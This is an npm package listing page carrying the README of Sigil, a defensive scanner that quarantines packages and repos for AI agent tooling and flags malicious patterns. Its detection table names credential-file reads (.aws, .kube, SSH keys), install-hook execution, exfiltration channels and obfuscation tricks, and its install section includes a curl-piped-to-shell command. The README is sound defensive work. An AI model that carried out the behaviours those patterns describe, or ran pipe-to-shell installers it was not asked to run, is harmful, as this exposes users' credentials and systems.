npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@reece_nomark/sigil

v1.0.2

Published

Automated security auditing for AI agent code - quarantine-first scanning for pip, npm, git repos, and MCP servers

Downloads

5

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

nomark-ainomark-ai

Keywords

securityscanningsupply-chainmalwareai-agentmcpclaudecursorpipnpmquarantinethreat-intelligence

Readme

Sigil scans repositories, packages, MCP servers, skills, and agent tooling for malicious patterns before they reach your working environment. Nothing runs until it's been scanned, scored, and explicitly approved.

The AI tooling ecosystem moves fast. Developers clone repos from tutorials, install MCP servers with 12 GitHub stars, and pull agent skills from Discord — all of which get direct access to API keys, databases, and cloud credentials. Traditional dependency scanners catch known CVEs but miss the real threat: intentionally malicious code designed to exfiltrate credentials, establish backdoors, or execute arbitrary commands via install hooks.

Sigil fills this gap with a quarantine-first approach.

Quick Install

Homebrew (macOS/Linux):

brew tap nomarj/tap
brew install sigil

npm (All platforms):

npm install -g @nomark/sigil

Cargo (Rust):

cargo install sigil

curl installer:

curl -sSL https://sigilsec.ai/install.sh | sh

Docker:

docker pull nomark/sigil:latest
docker run --rm -v $(pwd):/workspace nomark/sigil scan .

→ See all installation methods

How It Works

┌──────────────┐     ┌──────────────┐     ┌──────────────┐
│  You run a   │────▶│  Sigil       │────▶│  Clean?      │
│  command     │     │  quarantines │     │  Approve.    │
│              │     │  & scans     │     │  Dirty?      │
│  gclone      │     │              │     │  Reject.     │
│  safepip     │     │  6 phases.   │     │              │
│  safenpm     │     │  <3 seconds. │     │  You decide. │
└──────────────┘     └──────────────┘     └──────────────┘

Sigil runs six analysis phases on every scan:

| Phase | What It Catches | |-------|----------------| | Install Hooks | setup.py cmdclass, npm postinstall, Makefile targets that execute on install | | Code Patterns | eval(), exec(), pickle.loads, child_process, dynamic imports | | Network / Exfil | Outbound HTTP, webhooks, socket connections, DNS tunnelling | | Credentials | ENV var access, .aws, .kube, SSH keys, API key patterns | | Obfuscation | Base64 decode, charCode, hex encoding, minified payloads | | Provenance | Git history depth, author count, binary files, hidden files |

Each finding is weighted and scored. You get a clear verdict:

| Score | Verdict | What Happens | |-------|---------|-------------| | 0 | CLEAN | Auto-approve (configurable) | | 1–9 | LOW RISK | Approve with review | | 10–24 | MEDIUM RISK | Manual review required | | 25–49 | HIGH RISK | Blocked, requires override | | 50+ | CRITICAL | Blocked, no override |

Usage

Core Commands

# Clone a repo into quarantine, scan it, get a verdict
sigil clone https://github.com/someone/cool-mcp-server

# Download and scan a pip package before installing
sigil pip some-agent-toolkit

# Download and scan an npm package before installing
sigil npm langchain-community-plugin

# Scan a directory or file already on disk
sigil scan ./downloaded-skill/

# Download and scan any URL
sigil fetch https://example.com/agent-tool.tar.gz

# Manage quarantine
sigil list              # See all quarantined items
sigil approve abc123    # Move approved code out of quarantine
sigil reject abc123     # Permanently delete quarantined code

Shell Aliases

After running sigil install, these aliases are available in every terminal session. Use the commands you already know — Sigil protects you automatically:

| Alias | What It Does | |-------|-------------| | gclone <url> | git clone with quarantine + scan | | safepip <pkg> | pip install with scan first | | safenpm <pkg> | npm install with scan first | | safefetch <url> | Download + quarantine + scan | | audithere | Scan current directory | | qls | Quarantine status | | qapprove / qreject | Approve or reject most recent item |

Git Hooks

# Auto-scan any repo on clone (global git hook)
sigil install --git-hooks

IDE & Agent Integrations

Sigil works where you work. Install the plugin for your editor, or connect AI agents via MCP:

| Integration | Coverage | Install | |-------------|----------|---------| | VS Code / Cursor / Windsurf | Scan workspace, files, selections, packages. Findings in Problems panel. | plugins/vscode | | JetBrains IDEs | IntelliJ, WebStorm, PyCharm, GoLand, CLion, etc. Tool window + inline annotations. | plugins/jetbrains | | Claude Code (MCP) | 6 tools: scan, scan_package, clone, quarantine, approve, reject. | plugins/mcp-server | | GitHub Actions | Run Sigil as a CI check on every PR. | action.yml |

{
  "mcpServers": {
    "sigil": {
      "command": "node",
      "args": ["/path/to/sigil/plugins/mcp-server/dist/index.js"]
    }
  }
}

Build the MCP server first if you haven't already:

cd plugins/mcp-server && npm install && npm run build

npx @nomark/sigil-mcp-server will be available once the package is published to npm.

Threat Intelligence

When authenticated (sigil login), Sigil connects to a community-powered threat intelligence database. Every scan from every user contributes anonymised pattern data. When someone flags a malicious package, the threat signature propagates to all users within minutes.

No source code is ever transmitted — only pattern match metadata (which rules triggered, file types, risk scores).

Offline mode: All six scan phases run locally without authentication. Threat intelligence lookups are skipped, but you still get full local analysis.

# Authenticate to enable threat intel
sigil login

Learn more about authentication →

Why Not [Existing Tool]?

| Capability | Sigil | Snyk | Socket.dev | Semgrep | CodeQL | |-----------|-------|------|-----------|---------|--------| | Quarantine workflow | ✅ | ❌ | ❌ | ❌ | ❌ | | AI agent / MCP focus | ✅ | ❌ | Partial | ❌ | ❌ | | Install hook scanning | ✅ | ❌ | ✅ | ❌ | ❌ | | Credential exfil detection | ✅ | ❌ | Partial | Rules needed | Rules needed | | Multi-ecosystem (pip, npm, git, URL) | ✅ | ✅ | npm only | Any (rules) | GitHub only | | Community threat intel | ✅ | Advisory DB | ✅ | Community | ❌ | | Free tier with full CLI | ✅ | Limited | Limited | OSS free | Public repos |

Snyk and Dependabot flag known CVEs in dependency trees — they don't scan source code for intentional malice. Socket.dev is npm-only. Semgrep is a pattern engine, not an end-to-end workflow. CodeQL requires GitHub hosting. None of them quarantine code before it runs.

Pricing

The CLI is free and open source with all six scan phases. Paid tiers add cloud-backed threat intelligence, scan history, team management, and CI/CD integration.

| | Open Source | Pro — $29/mo | Team — $99/mo | |---|-----------|-------------|--------------| | Full CLI scanning | ✅ | ✅ | ✅ | | Cloud threat intelligence | — | ✅ | ✅ | | Scan history | — | 90 days | 1 year | | Web dashboard | — | ✅ | ✅ | | Team management & policies | — | — | Up to 25 seats | | CI/CD integration | — | — | ✅ | | Slack / webhook alerts | — | — | ✅ |

See full pricing →

Documentation

Comprehensive documentation is available in the docs/ directory:

Getting Started:

Technical Deep Dives:

Integration Guides:

Security Research:

Browse all documentation →

Roadmap

See ROADMAP.md for the full roadmap.

Today: Quarantine-first scanning for pip, npm, and git repos. Six-phase behavioral detection. Cloud threat intelligence with community reporting and signature sync. Dashboard with scan history, team management, and policy controls. Rust CLI binary, VS Code / Cursor / Windsurf extension (.vsix), JetBrains plugin, MCP server for AI agents, and GitHub Actions integration.

Now: Hosted cloud — sign up and scan without running infrastructure.

Next: Homebrew tap and npm package. Docker image and Go/Cargo scanning. VS Code Marketplace and JetBrains Marketplace listings. Custom scan rules via YAML. Enterprise SSO, RBAC, and audit logs. GitLab, Jenkins, and CircleCI integrations.

Contributing

We welcome contributions. See CONTRIBUTING.md for guidelines.

Security

Found a vulnerability? Please report it responsibly. See SECURITY.md.

License

Apache 2.0 — see LICENSE for details.